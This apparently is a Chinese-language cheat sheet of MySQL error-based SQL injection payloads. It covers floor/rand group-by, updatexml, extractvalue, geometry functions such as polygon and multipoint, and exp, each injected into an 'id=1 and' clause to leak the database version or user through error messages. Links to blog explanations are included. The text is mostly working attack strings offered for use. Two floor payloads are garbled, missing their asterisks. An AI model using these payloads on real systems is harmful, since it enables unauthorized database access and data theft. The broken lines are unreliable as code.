报错注入
1.floor报错
可以通过如下利用代码
- and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);
- and (select count() from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)2)));
实例
-
进行正常查询
- 该实例id输入存在注入,可以通过以下语句进行报错
select * from users where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
报错内容
ERROR 1062 (23000): Duplicate entry 'mysql版本号(如5.4.331)' for key 'group_key'
附
floor报错原理解释
https://www.cnblogs.com/litlife/p/8472323.html
2.updatexml报错
- updataxml()函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
实例
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
附
updatexml报错原理解释
https://www.cnblogs.com/xishaonian/p/6243497.html
xpath语法:https://www.bbsmax.com/A/gVdnw4DzWl/
3.extractvalue报错
- extractvalue()函数
extractvalue():从目标XML中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
concat:返回结果为连接参数产生的字符串。
实例
select * from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
报错原理和updataxml相同
注: 以下报错方式暂时没遇见过,只是知道有这么个报错注入
4.geometrycollection报错
select * from xxx where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint报错
select * from xxx where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon报错
select * from xxx where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon报错
select * from xxx where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring报错
select * from xxx where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring报错
select * from xxx where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp报错
select * from xxx where id=1 and exp(~(select * from(select user())a));
附
报错注入
https://blog.csdn.net/liangdongjuan/article/details/78406395
报错注入原理分析
http://blog.51cto.com/wt7315/1891458
